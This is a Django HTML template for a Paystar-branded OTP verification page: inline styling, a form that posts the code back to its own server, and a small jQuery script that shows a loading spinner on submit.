<!DOCTYPE html>
<html lang="en">
<head>
    {% load static %}
    <title> Account Login </title>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <meta name="google-site-verification" content="xvuwWcwMzYkjAaj94DZz4SPfl4iM4Bb8JzW28t0Xlb4" />
    <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400&display=swap" rel="stylesheet">
    <link rel="shortcut icon" href="{% static 'IMG-20240819-WA0006.jpg' %}" type="image/jpg">
    <link rel="apple-touch-icon" href="{% static 'IMG-20240819-WA0006.jpg' %}">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.7.1/jquery.min.js"></script>
    <style>
      body {
    margin: 0;
    padding: 0;
    font-family: Arial, sans-serif;
    display: flex;
    justify-content: center;
    align-items: center;
    height: 100vh;
    background-color: #f9f9f9;
}

.container {
    width: 80%;
    max-width: 400px;
    padding: 20px;
    box-shadow: 0 4px 10px rgba(0, 0, 0, 0.1);
    border-radius: 10px;
    background-color: #ffffff;
}


.login-box {
    text-align: center;
}

.logo img {
    width: 80px;
    border-radius: 50vw;
}

h1 {
    font-size: 24px;
    margin: 10px 0;
    color: #333333;
}

p {
    color: #888888;
    margin: 5px 0 20px;
}

.input-group {
    position: relative;
    margin-bottom: 20px;
}

input[type="number"],
input[type="password"] {
    width: 100%;
    padding: 15px;
    margin: 8px 0;
    box-sizing: border-box;
    border: 1px solid #dddddd;
    border-radius: 30px;
    background-color: #f3f3f3;
    font-size: 16px;
    outline: none;
}

input[type="email"]::placeholder,
input[type="password"]::placeholder {
    color: #888888;
}

.btn {
    background-color: #FFD400;
    color: #111;
    padding: 15px 20px;
    border: none;
    border-radius: 30px;
    font-size: 16px;
    cursor: pointer;
    width: 100%;
    transition: background-color 0.3s ease;
    font-weight: bold;
}

.btn:hover {
    background-color: #e0b800;
}

.toggle-password {
    position: absolute;
    right: 20px;
    top: 22px;
    cursor: pointer;
}

.footer {
    margin-top: 20px;
    color: #888888;
}

.footer a {
    color: #FFD400;
    text-decoration: none;
}

.footer a:hover {
    text-decoration: underline;
}

.keep {
  color: #FFD400;
  font-weight: bold;
}

.spinner-border {
      display: inline-block;
      width: 1rem; /* Adjust size for button */
      height: 1rem;
      vertical-align: text-bottom;
      border: 0.15em solid white;
      border-right-color: transparent;
      border-radius: 50%;
      animation: spinner-border 0.75s linear infinite;
    }

    @keyframes spinner-border {
      to {
        transform: rotate(360deg);
      }
    }
    </style>
</head>
<body>
    <div class="container">
        <div class="login-box">
            <div class="logo">
                <img src="https://paystar.com.ng/static/IMG-20240819-WA0006.jpg" alt="Paystar Logo">
            </div>
            <h1>VERIFY OTP</h1>
            <p class="keep">Keep your data safe</p>
            <form method="POST">
              {% csrf_token %}
                <div class="input-group">
                    <input type="number" id="email" name="otp" placeholder="Enter OTP" required>
                </div>
                <button type="submit" class="btn"><span class="visually-hidden">CONTINUE</span>
           <div class="add-role" role="status"></div></button>
            </form>
            <p style="color: red">{{error}}</p>
        </div>
    </div>
   <script>
     $(document).ready(() => {
      $(".btn").on("click", (e) => {
        e.preventDefault();  // Prevent the form from submitting immediately
        let username = $("#email").val();
        //let passwordVal = $("#pass").val();

        if (username) {
            $(".btn").css({ "background-color": "grey", "color": "white" });
            $(".btn").attr('disabled', true);
            $(".visually-hidden").text("Processing...");
            $(".add-role").addClass("spinner-border");
            $('form').submit();
        } else {
            $(".btn").css({ "background-color": "#FFD400", "color": "white" });
            $(".btn").attr('disabled', false);
            $(".visually-hidden").text("LOGIN");
            $(".add-role").removeClass("spinner-border");
        }
    });
});
   </script>
</body>
</html>